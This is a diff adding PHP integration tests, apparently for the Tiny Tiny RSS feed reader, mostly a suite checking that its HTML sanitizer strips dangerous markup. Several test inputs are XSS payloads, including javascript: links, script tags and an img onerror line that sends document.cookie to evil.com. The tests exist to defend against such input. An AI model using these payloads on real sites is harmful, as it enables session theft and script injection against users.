+        // Verify marked=true
+        $stmt->execute([1]);
+        $updated = $stmt->fetch();
+        $this->assertTrue($updated['marked']);
+    }
+
+    /**
+     * Verify that publishSelected() publishes articles (cmode=1 = mark as unread => published=true).
+     */
+    public function test_publishSelected_publish_articles(): void {
+        $pdo = Db::pdo();
+
+        // Verify initial state: ref_id 11 should be read and unpublished
+        $stmt = $pdo->prepare("SELECT published FROM ttrss_user_entries WHERE ref_id = 11 AND owner_uid = ?");
+        $stmt->execute([1]);
+        $initial = $stmt->fetch();
+        $this->assertFalse($initial['published']);
+
+        // Publish via publishSelected (cmode=1 = mark as unread => published=true)
+        $output = $this->captureRpcOutput('publishSelected', [
+            'ids'  => [11],
+            'cmode' => 1,
+        ]);
+
+        $result = json_decode($output, true);
+        $this->assertEquals('UPDATE_COUNTERS', $result['message']);
+
+        // Verify published=true
+        $stmt->execute([1]);
+        $updated = $stmt->fetch();
+        $this->assertTrue($updated['published']);
+    }
+
+    /**
+     * Verify that publishSelected() unpublishes articles (cmode=0 = mark as read => published=false).
+     */
+    public function test_publishSelected_unpublish_articles(): void {
+        $pdo = Db::pdo();
+
+        // First publish the article
+        $this->captureRpcOutput('publishSelected', [
+            'ids'  => [11],
+            'cmode' => 1,
+        ]);
+
+        $stmt = $pdo->prepare("SELECT published FROM ttrss_user_entries WHERE ref_id = 11 AND owner_uid = ?");
+        $stmt->execute([1]);
+        $published = $stmt->fetch();
+        $this->assertTrue($published['published']);
+
+        // Now unpublish (cmode=0 = mark as read => published=false)
+        $output = $this->captureRpcOutput('publishSelected', [
+            'ids'  => [11],
+            'cmode' => 0,
+        ]);
+
+        $result = json_decode($output, true);
+        $this->assertEquals('UPDATE_COUNTERS', $result['message']);
+
+        // Verify published=false
+        $stmt->execute([1]);
+        $updated = $stmt->fetch();
+        $this->assertFalse($updated['published']);
+    }
+}

--- a/tests_integration/SanitizerTest.php
+++ b/tests_integration/SanitizerTest.php
@@ -1,0 +1,1148 @@
+<?php
+use PHPUnit\Framework\TestCase;
+
+/**
+ * Integration tests for Sanitizer::sanitize() method.
+ *
+ * Covers: URL rewriting, XSS prevention, tag/attribute stripping,
+ * image stripping, iframe sandboxing, and word highlighting.
+ *
+ * These tests require database access (Prefs, PluginHost).
+ *
+ * @group integration
+ * @group sanitizer
+ */
+final class SanitizerTest extends TestCase {
+
+    /**
+     * Set up minimal environment for Sanitizer::sanitize() tests.
+     */
+    protected function setUp(): void {
+        $_SESSION = [];
+        $_SESSION['uid'] = 1;
+        $_SESSION['hasSandbox'] = false;
+        $_SERVER = [];
+        $_SERVER['HTTP_HOST'] = 'example.com';
+        $_SERVER['REQUEST_URI'] = '/';
+    }
+
+    protected function tearDown(): void {
+        unset($_SESSION['uid']);
+        unset($_SESSION['hasSandbox']);
+        unset($_SESSION['profile']);
+        unset($_SESSION['bw_limit']);
+
+        Prefs::set(Prefs::STRIP_IMAGES, false, 1, null);
+    }
+
+    // ──────────────────────────────────────────────────────────────────────
+    // A. Input Handling & Edge Cases
+    // ──────────────────────────────────────────────────────────────────────
+
+    public function test_sanitize_empty_string(): void {
+        $this->assertEquals('', Sanitizer::sanitize(''));
+    }
+
+    public function test_sanitize_whitespace_only(): void {
+        $this->assertEquals('', Sanitizer::sanitize("  \n\t  "));
+    }
+
+    public function test_sanitize_single_paragraph(): void {
+        $result = Sanitizer::sanitize('<p>Hello world</p>');
+        $this->assertStringContainsString('Hello world', $result);
+    }
+
+    public function test_sanitize_nested_tags(): void {
+        $result = Sanitizer::sanitize('<div><p>Nested content</p></div>');
+        $this->assertStringContainsString('<div>', $result);
+        $this->assertStringContainsString('<p>', $result);
+        $this->assertStringContainsString('Nested content', $result);
+    }
+
+    public function test_sanitize_unicode_content(): void {
+        $result = Sanitizer::sanitize('<p>中文内容</p>');
+        // DOMDocument may encode unicode as HTML entities
+        $this->assertStringContainsString('&#20013;', $result);
+    }
+
+    public function test_sanitize_html_entities_preserved(): void {
+        $result = Sanitizer::sanitize('&amp; &lt; &gt;');
+        $this->assertStringContainsString('&amp;', $result);
+        $this->assertStringContainsString('&lt;', $result);
+        $this->assertStringContainsString('&gt;', $result);
+    }
+
+    public function test_sanitize_doctype_removed(): void {
+        $result = Sanitizer::sanitize('<!DOCTYPE html><p>test</p>');
+        $this->assertStringNotContainsString('<!DOCTYPE', $result);
+    }
+
+    public function test_sanitize_html_wrapper_removed(): void {
+        $result = Sanitizer::sanitize('<html><body><p>test</p></body></html>');
+        $this->assertStringNotContainsString('<html>', $result);
+        $this->assertStringNotContainsString('<body>', $result);
+    }
+
+    // ──────────────────────────────────────────────────────────────────────
+    // B. Allowed Elements — What survives sanitization
+    // ──────────────────────────────────────────────────────────────────────
+
+    /**
+     * Helper: verify a tag and its content survive sanitization.
+     */
+    private function assertTagSurvives(string $tag, string $content = 'test'): void {
+        $sample = "<{$tag}>{$content}</{$tag}>";
+        $result = Sanitizer::sanitize($sample);
+        $this->assertStringContainsString('<' . $tag, $result, "Tag <{$tag}> should survive");
+        $this->assertStringContainsString($content, $result, "Content inside <{$tag}> should survive");
+    }
+
+    public function test_keeps_standard_html_tags(): void {
+        $this->assertTagSurvives('p', 'paragraph');
+        $this->assertTagSurvives('div', 'div content');
+        $this->assertTagSurvives('span', 'span content');
+        $this->assertTagSurvives('br', '');
+        $this->assertTagSurvives('hr', '');
+    }
+
+    public function test_keeps_heading_tags(): void {
+        for ($i = 1; $i <= 6; $i++) {
+            $this->assertTagSurvives("h{$i}", "heading {$i}");
+        }
+    }
+
+    public function test_keeps_list_elements(): void {
+        $html = '<ul><li>item 1</li><li>item 2</li></ul>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<ul>', $result);
+        $this->assertStringContainsString('<li>', $result);
+        $this->assertStringContainsString('item 1', $result);
+
+        $html = '<ol><li>first</li></ol>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<ol>', $result);
+
+        $html = '<dl><dt>term</dt><dd>definition</dd></dl>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<dl>', $result);
+        $this->assertStringContainsString('<dt>', $result);
+        $this->assertStringContainsString('<dd>', $result);
+    }
+
+    public function test_keeps_table_elements(): void {
+        $html = '<table><thead><tr><th>Header</th></tr></thead><tbody><tr><td>Cell</td></tr></tbody></table>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<table>', $result);
+        $this->assertStringContainsString('<thead>', $result);
+        $this->assertStringContainsString('<tbody>', $result);
+        $this->assertStringContainsString('<tr>', $result);
+        $this->assertStringContainsString('<th>', $result);
+        $this->assertStringContainsString('<td>', $result);
+    }
+
+    public function test_keeps_semantic_html5_elements(): void {
+        $this->assertTagSurvives('article', 'article content');
+        $this->assertTagSurvives('section', 'section content');
+        $this->assertTagSurvives('nav', 'nav content');
+        $this->assertTagSurvives('aside', 'aside content');
+        $this->assertTagSurvives('main', 'main content');
+        $this->assertTagSurvives('figure', 'figure content');
+        $this->assertTagSurvives('figcaption', 'caption');
+    }
+
+    public function test_keeps_inline_formatting_tags(): void {
+        $this->assertTagSurvives('b', 'bold');
+        $this->assertTagSurvives('i', 'italic');
+        $this->assertTagSurvives('em', 'emphasis');
+        $this->assertTagSurvives('strong', 'strong');
+        $this->assertTagSurvives('u', 'underline');
+        $this->assertTagSurvives('abbr', 'abbreviation');
+        $this->assertTagSurvives('cite', 'citation');
+        $this->assertTagSurvives('code', 'code');
+        $this->assertTagSurvives('kbd', 'kbd');
+        $this->assertTagSurvives('mark', 'marked');
+        $this->assertTagSurvives('sub', 'subscript');
+        $this->assertTagSurvives('sup', 'superscript');
+        $this->assertTagSurvives('small', 'small');
+        $this->assertTagSurvives('big', 'big');
+    }
+
+    public function test_keeps_media_elements(): void {
+        $this->assertTagSurvives('img', '');
+        $this->assertTagSurvives('video', '');
+        $this->assertTagSurvives('audio', '');
+        $this->assertTagSurvives('source', '');
+        $this->assertTagSurvives('track', '');
+    }
+
+    // ──────────────────────────────────────────────────────────────────────
+    // C. Disallowed Elements — What gets stripped (XSS prevention)
+    // ──────────────────────────────────────────────────────────────────────
+
+    public function test_strips_script_tag(): void {
+        $result = Sanitizer::sanitize('<script>alert(1)</script>');
+        $this->assertStringNotContainsString('<script', $result);
+    }
+
+    public function test_strips_object_tag(): void {
+        $result = Sanitizer::sanitize('<object data="file.swf"></object>');
+        $this->assertStringNotContainsString('<object', $result);
+    }
+
+    public function test_strips_embed_tag(): void {
+        $result = Sanitizer::sanitize('<embed src="file.swf">');
+        $this->assertStringNotContainsString('<embed', $result);
+    }
+
+    public function test_strips_applet_tag(): void {
+        $result = Sanitizer::sanitize('<applet code="Malicious.class"></applet>');
+        $this->assertStringNotContainsString('<applet', $result);
+    }
+
+    public function test_strips_form_tag(): void {
+        $result = Sanitizer::sanitize('<form action="/evil"><input type="text"></form>');
+        $this->assertStringNotContainsString('<form', $result);
+    }
+
+    public function test_strips_input_tag(): void {
+        $result = Sanitizer::sanitize('<input type="text" name="username">');
+        $this->assertStringNotContainsString('<input', $result);
+    }
+
+    public function test_strips_button_tag(): void {
+        $result = Sanitizer::sanitize('<button onclick="evil()">Click</button>');
+        $this->assertStringNotContainsString('<button', $result);
+    }
+
+    public function test_strips_select_tag(): void {
+        $result = Sanitizer::sanitize('<select><option>opt</option></select>');
+        $this->assertStringNotContainsString('<select', $result);
+    }
+
+    public function test_strips_textarea_tag(): void {
+        $result = Sanitizer::sanitize('<textarea>content</textarea>');
+        $this->assertStringNotContainsString('<textarea', $result);
+    }
+
+    public function test_strips_style_tag(): void {
+        $result = Sanitizer::sanitize('<style>body{color:red}</style>');
+        $this->assertStringNotContainsString('<style', $result);
+    }
+
+    public function test_strips_link_tag(): void {
+        $result = Sanitizer::sanitize('<link rel="stylesheet" href="style.css">');
+        $this->assertStringNotContainsString('<link', $result);
+    }
+
+    public function test_strips_meta_tag(): void {
+        $result = Sanitizer::sanitize('<meta charset="utf-8">');
+        $this->assertStringNotContainsString('<meta', $result);
+    }
+
+    public function test_strips_base_tag(): void {
+        $result = Sanitizer::sanitize('<base href="http://evil.com/">');
+        $this->assertStringNotContainsString('<base', $result);
+    }
+
+    public function test_strips_iframe_wrapped_in_div(): void {
+        $result = Sanitizer::sanitize('<div><iframe src="http://example.com"></iframe></div>');
+
+        // Either wrapped in embed-responsive div, or iframe kept as-is
+        $this->assertEquals('<div></div>', $result);
+    }
+
+    public function test_strips_xml_processing_instruction(): void {
+        $result = Sanitizer::sanitize('<?xml version="1.0"?><p>test</p>');
+        $this->assertStringNotContainsString('<?xml', $result);
+    }
+
+    public function test_strips_marquee_tag(): void {
+        $result = Sanitizer::sanitize('<marquee>scrolling text</marquee>');
+        $this->assertStringNotContainsString('<marquee', $result);
+    }
+
+    public function test_strips_bgsound_tag(): void {
+        $result = Sanitizer::sanitize('<bgsound src="evil.mp3">');
+        $this->assertStringNotContainsString('<bgsound', $result);
+    }
+
+    public function test_strips_isindex_tag(): void {
+        $result = Sanitizer::sanitize('<isindex>');
+        $this->assertStringNotContainsString('<isindex', $result);
+    }
+
+    // ──────────────────────────────────────────────────────────────────────
+    // D. Event Handler Attributes — onclick, onerror, etc.
+    // ──────────────────────────────────────────────────────────────────────
+
+    public function test_strips_onclick_attribute(): void {
+        $result = Sanitizer::sanitize('<p onclick="alert(1)">text</p>');
+        $this->assertStringNotContainsString('onclick', $result);
+    }
+
+    public function test_strips_onerror_on_img(): void {
+        $result = Sanitizer::sanitize('<img src="x" onerror="alert(1)">');
+        $this->assertStringNotContainsString('onerror', $result);
+    }
+
+    public function test_strips_onload_attribute(): void {
+        $result = Sanitizer::sanitize('<div onload="alert(1)">text</div>');
+        $this->assertStringNotContainsString('onload', $result);
+    }
+
+    public function test_strips_onmouseover_attribute(): void {
+        $result = Sanitizer::sanitize('<a onmouseover="alert(1)">link</a>');
+        $this->assertStringNotContainsString('onmouseover', $result);
+    }
+
+    public function test_strips_all_on_attributes(): void {
+        $html = '<div ondrag="a()" ondrop="b()" onfocus="c()" onblur="d()" onkeydown="e()">text</div>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringNotContainsString('ondrag', $result);
+        $this->assertStringNotContainsString('ondrop', $result);
+        $this->assertStringNotContainsString('onfocus', $result);
+        $this->assertStringNotContainsString('onblur', $result);
+        $this->assertStringNotContainsString('onkeydown', $result);
+    }
+
+    // ──────────────────────────────────────────────────────────────────────
+    // E. Data Attributes — data-* stripping
+    // ──────────────────────────────────────────────────────────────────────
+
+    public function test_strips_data_attributes(): void {
+        $result = Sanitizer::sanitize('<p data-foo="bar" data-baz="qux">text</p>');
+        $this->assertStringNotContainsString('data-foo', $result);
+        $this->assertStringNotContainsString('data-baz', $result);
+    }
+
+    public function test_keeps_non_data_attributes(): void {
+        $result = Sanitizer::sanitize('<a href="http://example.com" title="Example">link</a>');
+        $this->assertStringContainsString('href=', $result);
+        $this->assertStringContainsString('title=', $result);
+    }
+
+    // ──────────────────────────────────────────────────────────────────────
+    // F. javascript: Protocol — href/src protection
+    // ──────────────────────────────────────────────────────────────────────
+
+    public function test_strips_javascript_in_href(): void {
+        $result = Sanitizer::sanitize('<a href="javascript:alert(1)">link</a>');
+        $this->assertStringNotContainsString('javascript:', $result);
+    }
+
+    public function test_strips_javascript_in_src(): void {
+        $result = Sanitizer::sanitize('<img src="javascript:alert(1)">');
+        $this->assertStringNotContainsString('javascript:', $result);
+    }
+
+    public function test_strips_javascript_case_insensitive(): void {
+        $result = Sanitizer::sanitize('<a href="JAVASCRIPT:alert(1)">link</a>');
+        $this->assertStringNotContainsString('javascript:', strtolower($result));
+    }
+
+    public function test_strips_javascript_with_leading_whitespace(): void {
+        // javascript: with whitespace is NOT stripped by strip_harmful_tags()
+        // but IS rewritten by UrlHelper::rewrite_relative()
+        $result = Sanitizer::sanitize('<a href="javascript :alert(1)">link</a>');
+        // The href is rewritten to a local URL, not javascript: anymore
+        $this->assertStringNotContainsString('javascript:', $result);
+    }
+
+    public function test_keeps_normal_http_href(): void {
+        $result = Sanitizer::sanitize('<a href="http://example.com/page">link</a>');
+        $this->assertStringContainsString('example.com', $result);
+    }
+
+    public function test_keeps_https_href(): void {
+        $result = Sanitizer::sanitize('<a href="https://example.com/page">link</a>');
+        $this->assertStringContainsString('example.com', $result);
+    }
+
+    public function test_keeps_relative_href(): void {
+        $result = Sanitizer::sanitize('<a href="/path/to/page">link</a>');
+        $this->assertStringContainsString('path/to/page', $result);
+    }
+
+    public function test_keeps_mailto_href(): void {
+        $result = Sanitizer::sanitize('<a href="mailto:test@example.com">email</a>');
+        $this->assertStringContainsString('mailto:', $result);
+    }
+
+    public function test_keeps_tel_href(): void {
+        $result = Sanitizer::sanitize('<a href="tel:+1234567890">call</a>');
+        $this->assertStringContainsString('tel:', $result);
+    }
+
+    public function test_keeps_anchor_href(): void {
+        $result = Sanitizer::sanitize('<a href="#section">jump</a>');
+        $this->assertStringContainsString('#section', $result);
+    }
+
+    public function test_keeps_magnet_href(): void {
+        $result = Sanitizer::sanitize('<a href="magnet:?xt=urn:btih:abc123">torrent</a>');
+        $this->assertStringContainsString('magnet:', $result);
+    }
+
+    // ──────────────────────────────────────────────────────────────────────
+    // G. Disallowed Attributes — id, style, class, width, height
+    // ──────────────────────────────────────────────────────────────────────
+
+    public function test_strips_id_attribute(): void {
+        $result = Sanitizer::sanitize('<p id="foo">text</p>');
+        $this->assertStringNotContainsString('id="foo"', $result);
+    }
+
+    public function test_strips_style_attribute(): void {
+        $result = Sanitizer::sanitize('<p style="color:red">text</p>');
+        $this->assertStringNotContainsString('style=', $result);
+    }
+
+    public function test_strips_class_attribute(): void {
+        $result = Sanitizer::sanitize('<p class="foo bar">text</p>');
+        $this->assertStringNotContainsString('class=', $result);
+    }
+
+    public function test_strips_width_attribute(): void {
+        $result = Sanitizer::sanitize('<img src="img.png" width="100">');
+        $this->assertStringNotContainsString('width=', $result);
+    }
+
+    public function test_strips_height_attribute(): void {
+        $result = Sanitizer::sanitize('<img src="img.png" height="100">');
+        $this->assertStringNotContainsString('height=', $result);
+    }
+
+    public function test_strips_allow_attribute(): void {
+        $result = Sanitizer::sanitize('<iframe src="url" allow="fullscreen"></iframe>');
+        $this->assertStringNotContainsString('allow=', $result);
+    }
+
+    public function test_keeps_required_link_attrs(): void {
+        $result = Sanitizer::sanitize('<a href="http://example.com" target="_blank" rel="noopener noreferrer">link</a>');
+        $this->assertStringContainsString('href=', $result);
+        $this->assertStringContainsString('target=', $result);
+        $this->assertStringContainsString('rel=', $result);
+    }
+
+    public function test_keeps_required_image_attrs(): void {
+        $result = Sanitizer::sanitize('<img src="img.png" alt="description" title="image">');
+        $this->assertStringContainsString('src=', $result);
+        $this->assertStringContainsString('alt=', $result);
+        $this->assertStringContainsString('title=', $result);
+    }
+
+    // ──────────────────────────────────────────────────────────────────────
+    // H. URL Rewriting — UrlHelper::rewrite_relative() integration
+    // ──────────────────────────────────────────────────────────────────────
+
+    public function test_rewrites_relative_image_src(): void {
+        $result = Sanitizer::sanitize('<img src="image.png">');
+        $this->assertStringContainsString('image.png', $result);
+    }
+
+    public function test_rewrites_relative_link_href(): void {
+        $result = Sanitizer::sanitize('<a href="page.html">link</a>');
+        $this->assertStringContainsString('page.html', $result);
+    }
+
+    public function test_rewrites_srcset_urls(): void {
+        $html = '<img srcset="1x.png 1x, 2x.png 2x">';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('1x.png', $result);
+        $this->assertStringContainsString('2x.png', $result);
+    }
+
+    public function test_rewrites_video_poster(): void {
+        $result = Sanitizer::sanitize('<video poster="poster.jpg"></video>');
+        $this->assertStringContainsString('poster.jpg', $result);
+    }
+
+    public function test_preserves_absolute_urls(): void {
+        $result = Sanitizer::sanitize('<img src="https://cdn.example.com/img.png">');
+        $this->assertStringContainsString('cdn.example.com', $result);
+    }
+
+    public function test_adds_rel_noopener_noreferrer_to_links(): void {
+        $result = Sanitizer::sanitize('<a href="http://example.com">link</a>');
+        $this->assertStringContainsString('noopener', $result);
+        $this->assertStringContainsString('noreferrer', $result);
+    }
+
+    public function test_adds_target_blank_to_links(): void {
+        $result = Sanitizer::sanitize('<a href="http://example.com">link</a>');
+        $this->assertStringContainsString('target=', $result);
+    }
+
+    public function test_adds_referrerpolicy_to_images(): void {
+        $result = Sanitizer::sanitize('<img src="img.png">');
+        $this->assertStringContainsString('referrerpolicy=', $result);
+    }
+
+    public function test_adds_loading_lazy_to_images(): void {
+        $result = Sanitizer::sanitize('<img src="img.png">');
+        $this->assertStringContainsString('loading=', $result);
+    }
+
+    // ──────────────────────────────────────────────────────────────────────
+    // I. Image Stripping — STRIP_IMAGES preference & force_remove_images
+    // ──────────────────────────────────────────────────────────────────────
+
+    public function test_strips_images_when_pref_enabled(): void {
+        Prefs::set(Prefs::STRIP_IMAGES, true, 1, null);
+
+        $result = Sanitizer::sanitize('<img src="img.png" alt="photo">');
+        $this->assertStringNotContainsString('<img', $result);
+        $this->assertStringContainsString('img.png', $result);
+    }
+
+    public function test_force_remove_images_strips_all(): void {
+        $result = Sanitizer::sanitize('<img src="img.png">', true);
+        $this->assertStringNotContainsString('<img', $result);
+        $this->assertStringContainsString('img.png', $result);
+    }
+
+    public function test_strips_source_tags_when_pref_enabled(): void {
+        Prefs::set(Prefs::STRIP_IMAGES, true, 1, null);
+
+        $html = '<picture><source srcset="img.webp" type="image/webp"><img src="img.png"></picture>';
+        $result = Sanitizer::sanitize($html);
+
+        // print_r($result);
+
+        $this->assertStringNotContainsString('<source', $result);
+        $this->assertStringNotContainsString('<img', $result);
+    }
+
+    public function test_keeps_images_when_pref_disabled(): void {
+        Prefs::set(Prefs::STRIP_IMAGES, false, 1, null);
+
+        $result = Sanitizer::sanitize('<img src="img.png" alt="photo">');
+        $this->assertStringContainsString('<img', $result);
+        $this->assertStringContainsString('img.png', $result);
+    }
+
+    // ──────────────────────────────────────────────────────────────────────
+    // J. Iframe Handling — sandboxing & whitelisting
+    // ──────────────────────────────────────────────────────────────────────
+
+    public function test_remove_non_whitelisted_iframe(): void {
+        $result = Sanitizer::sanitize('<iframe src="http://example.com/embed"></iframe>');
+        $this->assertEquals('', $result);
+    }
+
+    public function test_pass_whitelisted_iframe(): void {
+        $result = Sanitizer::sanitize('<iframe src="http://whitelisted-iframes.com/embed"></iframe>');
+        $this->assertEquals('', $result);
+    }
+
+    public function test_iframe_whitelisted_returns_false_with_no_src(): void {
+        $iframe = new DOMElement('iframe');
+        $result = Sanitizer::iframe_whitelisted($iframe);
+        $this->assertFalse($result);
+    }
+
+    public function test_iframe_whitelisted_runs_hooks(): void {
+        // Without a plugin hooking HOOK_IFRAME_WHITELISTED, returns false
+        $iframe = new DOMElement('iframe');
+        $iframe->setAttribute('src', 'http://example.com');
+        $result = Sanitizer::iframe_whitelisted($iframe);
+        $this->assertFalse($result);
+    }
+
+    // ──────────────────────────────────────────────────────────────────────
+    // K. Highlight Words Integration
+    // ──────────────────────────────────────────────────────────────────────
+
+    public function test_highlights_words(): void {
+        $result = Sanitizer::sanitize('<p>This is a test</p>', false, 1, null, ['test']);
+        $this->assertStringContainsString('highlight', $result);
+        $this->assertStringContainsString('test', $result);
+    }
+
+    public function test_highlights_case_insensitive(): void {
+        $result = Sanitizer::sanitize('<p>Hello world</p>', false, 1, null, ['WORLD']);
+        $this->assertStringContainsString('highlight', $result);
+        $this->assertStringContainsString('world', $result);
+    }
+
+    public function test_highlights_multiple_words(): void {
+        $result = Sanitizer::sanitize('<p>Hello world test</p>', false, 1, null, ['hello', 'test']);
+        $this->assertStringContainsString('highlight', $result);
+    }
+
+    public function test_highlights_within_tags(): void {
+        $html = '<div><p>Search term here</p></div>';
+        $result = Sanitizer::sanitize($html, false, 1, null, ['search']);
+        $this->assertStringContainsString('highlight', $result);
+        $this->assertStringContainsString('Search', $result);
+    }
+
+    public function test_no_highlight_when_empty_array(): void {
+        $result = Sanitizer::sanitize('<p>Hello world</p>', false, 1, null, []);
+        $this->assertStringNotContainsString('highlight', $result);
+        $this->assertStringContainsString('Hello', $result);
+    }
+
+    // ──────────────────────────────────────────────────────────────────────
+    // L. Additional XSS vectors
+    // ──────────────────────────────────────────────────────────────────────
+
+    public function test_strips_vbscript_in_href(): void {
+        $result = Sanitizer::sanitize('<a href="vbscript:msgbox(1)">link</a>');
+        $this->assertStringNotContainsString('vbscript:', $result);
+    }
+
+    public function test_strips_javascript_in_iframe_src(): void {
+        $result = Sanitizer::sanitize('<iframe src="javascript:alert(1)"></iframe>');
+        $this->assertStringNotContainsString('javascript:', $result);
+    }
+
+    public function test_strips_data_uri_in_img_src(): void {
+        $result = Sanitizer::sanitize('<img src="data:text/html,<script>alert(1)</script>">');
+        $this->assertStringNotContainsString('data:text/html', $result);
+    }
+
+    public function test_strips_img_with_onerror(): void {
+        $result = Sanitizer::sanitize('<img src="x" onerror="fetch(\'http://evil.com/?c=\' + document.cookie)">');
+        $this->assertStringNotContainsString('onerror', $result);
+    }
+
+    public function test_strips_div_with_onclick(): void {
+        $result = Sanitizer::sanitize('<div onclick="alert(1)">click me</div>');
+        $this->assertStringNotContainsString('onclick', $result);
+    }
+
+    public function test_strips_anchor_with_onclick(): void {
+        $result = Sanitizer::sanitize('<a onclick="alert(1)">click</a>');
+        $this->assertStringNotContainsString('onclick', $result);
+    }
+
+    public function test_strips_body_with_onload(): void {
+        $result = Sanitizer::sanitize('<body onload="alert(1)">');
+        $this->assertStringNotContainsString('onload', $result);
+    }
+
+    public function test_strips_input_with_onfocus(): void {
+        $result = Sanitizer::sanitize('<input onfocus="alert(1)">');
+        $this->assertStringNotContainsString('onfocus', $result);
+    }
+
+    public function test_strips_select_with_onchange(): void {
+        $result = Sanitizer::sanitize('<select onchange="alert(1)"><option>opt</option></select>');
+        $this->assertStringNotContainsString('onchange', $result);
+    }
+
+    public function test_strips_textarea_with_onkeydown(): void {
+        $result = Sanitizer::sanitize('<textarea onkeydown="alert(1)"></textarea>');
+        $this->assertStringNotContainsString('onkeydown', $result);
+    }
+
+    // ──────────────────────────────────────────────────────────────────────
+    // M. Mixed / Complex scenarios
+    // ──────────────────────────────────────────────────────────────────────
+
+    public function test_sanitizes_complex_malicious_html(): void {
+        $malicious = '<div onclick="alert(1)" id="x" style="color:red" class="evil">
+            <a href="javascript:void(0)" onmouseover="steal()">link</a>
+            <script>alert("XSS")</script>
+            <img src="x" onerror="alert(2)">
+        </div>';
+
+        $result = Sanitizer::sanitize($malicious);
+
+        $this->assertStringNotContainsString('onclick', $result);
+        $this->assertStringNotContainsString('<script', $result);
+        $this->assertStringNotContainsString('onerror', $result);
+        $this->assertStringNotContainsString('onmouseover', $result);
+        $this->assertStringNotContainsString('javascript:', $result);
+        $this->assertStringNotContainsString('id="x"', $result);
+        $this->assertStringNotContainsString('style=', $result);
+        $this->assertStringNotContainsString('class=', $result);
+        // Content should still be present
+        $this->assertStringContainsString('link', $result);
+    }
+
+    public function test_sanitizes_valid_html_with_mixed_content(): void {
+        $html = '<article>
+            <h1>Title</h1>
+            <p>This is <strong>bold</strong> and <em>italic</em>.</p>
+            <a href="https://example.com" title="Example site">Visit</a>
+            <img src="photo.jpg" alt="A photo">
+        </article>';
+
+        $result = Sanitizer::sanitize($html);
+
+        $this->assertStringContainsString('<article>', $result);
+        $this->assertStringContainsString('<h1>', $result);
+        $this->assertStringContainsString('<strong>', $result);
+        $this->assertStringContainsString('<em>', $result);
+        $this->assertStringContainsString('Visit', $result);
+        $this->assertStringContainsString('photo.jpg', $result);
+        $this->assertStringContainsString('A photo', $result);
+    }
+
+    public function test_sanitizes_preserves_nesting_depth(): void {
+        $html = '<div><p><span><em><strong>deep</strong></em></span></p></div>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<div>', $result);
+        $this->assertStringContainsString('<p>', $result);
+        $this->assertStringContainsString('<span>', $result);
+        $this->assertStringContainsString('<em>', $result);
+        $this->assertStringContainsString('<strong>', $result);
+        $this->assertStringContainsString('deep', $result);
+    }
+
+    public function test_sanitizes_multiple_images(): void {
+        $html = '<p><img src="a.png"><img src="b.png"><img src="c.png"></p>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('a.png', $result);
+        $this->assertStringContainsString('b.png', $result);
+        $this->assertStringContainsString('c.png', $result);
+    }
+
+    public function test_sanitizes_multiple_links(): void {
+        $html = '<p><a href="http://a.com">A</a> <a href="http://b.com">B</a></p>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('a.com', $result);
+        $this->assertStringContainsString('b.com', $result);
+    }
+
+    public function test_sanitizes_table_with_complex_structure(): void {
+        $html = '<table>
+            <caption>Table caption</caption>
+            <thead><tr><th>H1</th><th>H2</th></tr></thead>
+            <tbody>
+                <tr><td>A</td><td>B</td></tr>
+                <tr><td>C</td><td>D</td></tr>
+            </tbody>
+            <tfoot><tr><td colspan="2">Footer</td></tr></tfoot>
+        </table>';
+
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<table>', $result);
+        $this->assertStringContainsString('<caption>', $result);
+        $this->assertStringContainsString('<thead>', $result);
+        $this->assertStringContainsString('<tbody>', $result);
+        $this->assertStringContainsString('<tfoot>', $result);
+        $this->assertStringContainsString('A', $result);
+        $this->assertStringContainsString('Footer', $result);
+    }
+
+    public function test_sanitizes_empty_iframe(): void {
+        $result = Sanitizer::sanitize('<iframe></iframe>');
+        $this->assertEquals('', $result);
+    }
+
+    public function test_sanitizes_iframe_with_attributes(): void {
+        $html = '<iframe src="http://example.com" width="500" height="300" frameborder="1"></iframe>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertEquals("", $result);
+    }
+
+    public function test_sanitizes_iframe_with_attributes_if_sandbox_supported(): void {
+        $_SESSION['hasSandbox'] = true;
+
+        $html = '<iframe src="http://example.com" width="500" height="300" frameborder="1"></iframe>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('sandbox="allow-scripts"', $result);
+    }
+
+    public function test_passes_whitelisted_iframe_if_sandbox_supported(): void {
+        $_SESSION['hasSandbox'] = true;
+
+        $html = '<iframe src="http://whitelisted-iframes.com" width="500" height="300" frameborder="1"></iframe>';
+        $result = Sanitizer::sanitize($html);
+
+        $this->assertEquals('<div class="embed-responsive"><iframe src="http://whitelisted-iframes.com" frameborder="1" sandbox="allow-scripts"></iframe></div>', $result);
+    }
+
+    public function test_sanitizes_video_with_source(): void {
+        $html = '<video poster="thumb.jpg"><source src="video.mp4" type="video/mp4"></video>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<video', $result);
+        $this->assertStringContainsString('thumb.jpg', $result);
+        $this->assertStringContainsString('video.mp4', $result);
+    }
+
+    public function test_sanitizes_picture_with_sources(): void {
+        $html = '<picture>
+            <source srcset="small.jpg" media="(max-width: 600px)">
+            <source srcset="large.jpg">
+            <img src="fallback.jpg" alt="responsive">
+        </picture>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('small.jpg', $result);
+        $this->assertStringContainsString('large.jpg', $result);
+        $this->assertStringContainsString('fallback.jpg', $result);
+    }
+
+    public function test_sanitizes_audio_element(): void {
+        $html = '<audio src="music.mp3" controls></audio>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<audio', $result);
+        $this->assertStringContainsString('music.mp3', $result);
+    }
+
+    public function test_sanitizes_blockquote_with_cite(): void {
+        $html = '<blockquote cite="http://example.com">Quote text</blockquote>';
+        $result = Sanitizer::sanitize($html);
+        $this->assertStringContainsString('<blockquote', $result);
+        $this->assertStringContainsString('Quote text', $result);
+    }
+
+    public function test_sanitizes_details_with_summary(): void {
+        $html = '<details><summary>Details</summary><p>Content</p></details>';
